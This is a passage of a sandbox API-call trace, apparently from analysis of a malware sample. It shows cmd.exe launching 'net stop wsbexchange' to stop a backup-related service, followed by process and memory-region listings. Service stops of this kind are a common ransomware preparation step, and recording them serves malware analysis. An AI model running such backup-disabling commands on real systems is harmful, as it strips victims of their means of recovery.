out: lpLCData="Sun") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0140.198] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.199] GetConsoleTitleW (in: lpConsoleTitle=0x4efa9d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.199] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0140.199] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0140.199] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0140.199] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0140.200] _wcsicmp (_String1="net", _String2=")") returned 69 [0140.200] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0140.200] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0140.200] _wcsicmp (_String1="IF", _String2="net") returned -5 [0140.200] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0140.200] _wcsicmp (_String1="REM", _String2="net") returned 4 [0140.200] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0140.201] GetConsoleTitleW (in: lpConsoleTitle=0x4cef598, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.201] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0140.201] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0140.201] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0140.201] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0140.201] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0140.201] _wcsicmp (_String1="net", _String2="CD") returned 11 [0140.201] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0140.201] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0140.201] _wcsicmp (_String1="net", _String2="REN") returned -4 [0140.201] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0140.201] _wcsicmp (_String1="net", _String2="SET") returned -5 [0140.201] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0140.201] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0140.201] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0140.201] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0140.201] _wcsicmp (_String1="net", _String2="MD") returned 1 [0140.201] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0140.201] _wcsicmp (_String1="net", _String2="RD") returned -4 [0140.201] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0140.201] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0140.201] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0140.201] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0140.201] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0140.201] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0140.201] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0140.201] _wcsicmp (_String1="net", _String2="VER") returned -8 [0140.201] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0140.201] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0140.201] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0140.201] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0140.201] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0140.202] _wcsicmp (_String1="net", _String2="START") returned -5 [0140.202] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0140.202] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0140.202] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0140.202] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0140.202] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0140.202] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0140.202] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0140.202] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0140.202] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0140.202] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0140.202] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0140.202] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="CD") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0140.202] _wcsicmp (_String1="net", _String2="REN") returned -4 [0140.202] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0140.202] _wcsicmp (_String1="net", _String2="SET") returned -5 [0140.202] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0140.202] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0140.202] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="MD") returned 1 [0140.202] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0140.202] _wcsicmp (_String1="net", _String2="RD") returned -4 [0140.202] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0140.202] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0140.202] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0140.202] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0140.202] _wcsicmp (_String1="net", _String2="VER") returned -8 [0140.202] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0140.202] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0140.202] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0140.202] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0140.202] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0140.202] _wcsicmp (_String1="net", _String2="START") returned -5 [0140.202] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0140.202] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0140.202] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0140.202] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0140.202] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0140.202] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0140.202] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0140.202] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0140.202] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0140.202] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0140.202] _wcsicmp (_String1="net", _String2="IF") returned 5 [0140.202] _wcsicmp (_String1="net", _String2="REM") returned -4 [0140.203] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0140.203] SetErrorMode (uMode=0x0) returned 0x0 [0140.203] SetErrorMode (uMode=0x1) returned 0x0 [0140.203] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4ef05d0, lpFilePart=0x4cef0a4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cef0a4*="Desktop") returned 0x1d [0140.203] SetErrorMode (uMode=0x0) returned 0x1 [0140.203] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0140.203] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.210] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.210] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.210] GetConsoleTitleW (in: lpConsoleTitle=0x4cef324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.211] InitializeProcThreadAttributeList (in: lpAttributeList=0x4cef250, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4cef234 | out: lpAttributeList=0x4cef250, lpSize=0x4cef234) returned 1 [0140.211] UpdateProcThreadAttribute (in: lpAttributeList=0x4cef250, dwFlags=0x0, Attribute=0x60001, lpValue=0x4cef23c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4cef250, lpPreviousValue=0x0) returned 1 [0140.211] GetStartupInfoW (in: lpStartupInfo=0x4cef288 | out: lpStartupInfo=0x4cef288*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.211] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.212] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.213] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop wsbexchange", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4cef1d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop wsbexchange", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cef224 | out: lpCommandLine="net stop wsbexchange", lpProcessInformation=0x4cef224*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc50, dwThreadId=0xb3c)) returned 1 [0140.219] CloseHandle (hObject=0xa4) returned 1 [0140.219] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.219] GetEnvironmentStringsW () returned 0x4ef9ec0* [0140.219] FreeEnvironmentStringsA (penv="=") returned 1 [0140.219] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0140.396] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4cef1bc | out: lpExitCode=0x4cef1bc*=0x2) returned 1 [0140.396] CloseHandle (hObject=0xa8) returned 1 [0140.396] _vsnwprintf (in: _Buffer=0x4cef2a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4cef1c4 | out: _Buffer="00000002") returned 8 [0140.396] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0140.396] GetEnvironmentStringsW () returned 0x4efb3a0* [0140.396] FreeEnvironmentStringsA (penv="=") returned 1 [0140.396] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0140.396] GetEnvironmentStringsW () returned 0x4efb3a0* [0140.396] FreeEnvironmentStringsA (penv="=") returned 1 [0140.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x4cef250 | out: lpAttributeList=0x4cef250) [0140.396] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.396] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0140.396] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.397] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0140.397] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.397] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0140.397] SetConsoleInputExeNameW () returned 0x1 [0140.397] GetConsoleOutputCP () returned 0x1b5 [0140.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.397] exit (_Code=2) Thread: id = 735 os_tid = 0xc48 Process: id = "250" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x15a41000" os_pid = "0x2d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "249" os_parent_pid = "0xe30" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11985 start_va = 0x7f1f6000 end_va = 0x7f1f6fff entry_point = 0x0 region_type = private name = "private_0x000000007f1f6000" filename = "" Region: id = 11986 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11987 start_va = 0x5422ba0000 end_va = 0x5422bbffff entry_point = 0x0 region_type = private name = "private_0x0000005422ba0000" filename = "" Region: id = 11988 start_va = 0x5422bc0000 end_va = 0x5422bd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005422bc0000" filename = "" Region: id = 11989 start_va = 0x5422be0000 end_va = 0x5422c1ffff entry_point = 0x0 region_type = private name = "private_0x0000005422be0000" filename = "" Region: id = 11990 start_va = 0x7df5ffb70000 end_va = 0x7ff5ffb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb70000" filename = "" Region: id = 11991 start_va = 0x7ff6c48f0000 end_va = 0x7ff6c4912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48f0000" filename = "" Region: id = 11992 start_va = 0x7ff6c4914000 end_va = 0x7ff6c4914fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4914000" filename = "" Region: id = 11993 start_va = 0x7ff6c491e000 end_va = 0x7ff6c491ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c491e000" filename = "" Region: id = 11994 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11995 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11996 start_va = 0x5422ba0000 end_va = 0x5422baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005422ba0000" filename = "" Region: id = 11997 start_va = 0x5422bb0000 end_va = 0x5422bb6fff entry_point = 0x0 region_type = private name = "private_0x0000005422bb0000" filename = "" Region: id = 11998 start_va = 0x5422c20000 end_va = 0x5422cddfff entry_point = 0x5422c20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11999 start_va = 0x5422ce0000 end_va = 0x5422d1ffff entry_point = 0x0 region_type = private name = "private_0x0000005422ce0000" filename = "" Region: id = 12000 start_va = 0x5422d20000 end_va = 0x5422d20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005422d20000" filename = "" Region: id = 12001 start_va = 0x5422d30000 end_va = 0x5422d36fff entry_point = 0x0 region_type = private name = "private_0x0000005422d30000" filename = "" Region: id = 12002 start_va = 0x5422d40000 end_va = 0x5422d40fff entry_point = 0x0 region_type = private name = "private_0x0000005422d40000" filename = "" Region: id = 12003 start_va = 0x5422d50000 end_va = 0x5422d5ffff entry_point = 0x0 region_type = private name = "private_0x0000005422d50000" filename = "" Region: id = 12004 start_va = 0x5422d60000 end_va = 0x5422d60fff entry_point = 0x0 region_type = private name = "private_0x0000005422d60000" filename = "" Region: id = 12005 start_va = 0x5422dd0000 end_va = 0x5422ecffff entry_point = 0x0 region_type = private name = "private_0x0000005422dd0000" filename = "" Region: id = 12006 start_va = 0x5422ed0000 end_va = 0x5423057fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005422ed0000" filename = "" Region: id = 12007 start_va = 0x5423060000 end_va = 0x54231e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005423060000" filename = "" Region: id = 12008 start_va = 0x54231f0000 end_va = 0x54245effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000054231f0000" filename = "" Region: id = 12009 start_va = 0x7ff6c47f0000 end_va = 0x7ff6c48effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47f0000" filename = "" Region: id = 12010 start_va = 0x7ff6c491c000 end_va = 0x7ff6c491dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c491c000" filename = "" Region: id = 12011 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12012 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12013 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12014 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12015 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12016 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12017 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12018 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12019 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12020 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12021 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12022 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12023 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 12024 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 732 os_tid = 0xbc0 Thread: id = 733 os_tid = 0xc34 Thread: id = 734 os_tid = 0x620 Process: id = "251" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x15aff000" os_pid = "0xc50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "249" os_parent_pid = "0xe30" cmd_line = "net stop wsbexchange" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12038 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12039 start_va = 0xcb0000 end_va = 0x4caffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 12040 start_va = 0x4cb0000 end_va = 0x4ccffff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 12041 start_va = 0x4cd0000 end_va = 0x4cd1fff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 12042 start_va = 0x4ce0000 end_va = 0x4cf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ce0000" filename = "" Region: id = 12043 start_va = 0x4d00000 end_va = 0x4d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 12044 start_va = 0x4d40000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 12045 start_va = 0x4dc0000 end_va = 0x4dc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 12046 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 12047 start_va = 0x4de0000 end_va = 0x4de1fff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 12048 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12049 start_va = 0x7ed20000 end_va = 0x7ed42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed20000" filename = "" Region: id = 12050 start_va = 0x7ed49000 end_va = 0x7ed49fff entry_point = 0x0 region_type = private name = "private_0x000000007ed49000" filename = "" Region: id = 12051 start_va = 0x7ed4b000 end_va = 0x7ed4dfff entry_point = 0x0 region_type = private name = "private_0x000000007ed4b000" filename = "" Region: id = 12052 start_va = 0x7ed4e000 end_va = 0x7ed4efff entry_point = 0x0 region_type = private name = "private_0x000000007ed4e000" filename = "" Region: id = 12053 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12054 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12055 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12056 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12057 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff 